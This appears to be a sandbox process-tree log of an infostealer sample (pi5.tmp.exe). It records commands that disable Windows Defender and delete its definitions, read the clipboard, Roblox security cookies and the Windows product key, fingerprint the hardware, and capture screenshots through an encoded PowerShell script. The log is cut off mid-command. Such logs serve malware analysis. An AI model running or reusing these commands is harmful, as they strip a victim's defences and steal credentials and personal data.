C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:6908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:5252
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:6720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:1124
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:2084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:6868
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Loads dropped DLL
- Command and Scripting Interpreter: PowerShell
PID:3804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:2704
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:1416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Loads dropped DLL
PID:5852
-
-
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:5476
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3500
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman1⤵
- Modifies data under HKEY_USERS
PID:964
-
C:\Users\Admin\Downloads\pi5.tmp.exe"C:\Users\Admin\Downloads\pi5.tmp.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6252 -
C:\Users\Admin\AppData\Local\Temp\onefile_6252_133779369166687487\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exeC:\Users\Admin\Downloads\pi5.tmp.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:5244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
PID:5724
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:3824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5936
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:7124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:6344
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:6004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:5616
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5328
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5380
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1804
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:6184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵PID:1696
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\niftk4f5\niftk4f5.cmdline"5⤵PID:1740
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2A5.tmp" "c:\Users\Admin\AppData\Local\Temp\niftk4f5\CSC82926BFFFF2544C1AFF555464DB4FF8.TMP"6⤵PID:3516
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6072
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1592
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3740
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:7088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6820
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1960
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:6124
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
PID:4648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:1832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵PID:6452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:5612
-
C:\Windows\system32\getmac.exegetmac4⤵PID:1012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:5124
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:7112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:3220
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:5628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:5252
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:6940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
PID:5092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:5256
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:4712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵PID:5400
-
-
-
-
C:\Users\Admin\Downloads\pi5.tmp.exe"C:\Users\Admin\Downloads\pi5.tmp.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6972 -
C:\Users\Admin\AppData\Local\Temp\onefile_6972_133779369481622751\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exeC:\Users\Admin\Downloads\pi5.tmp.exe2⤵
- Executes dropped EXE
PID:1740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
PID:524
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:5392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5996
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:6192
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:4856
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:812
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:6764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5992
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:6016
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAA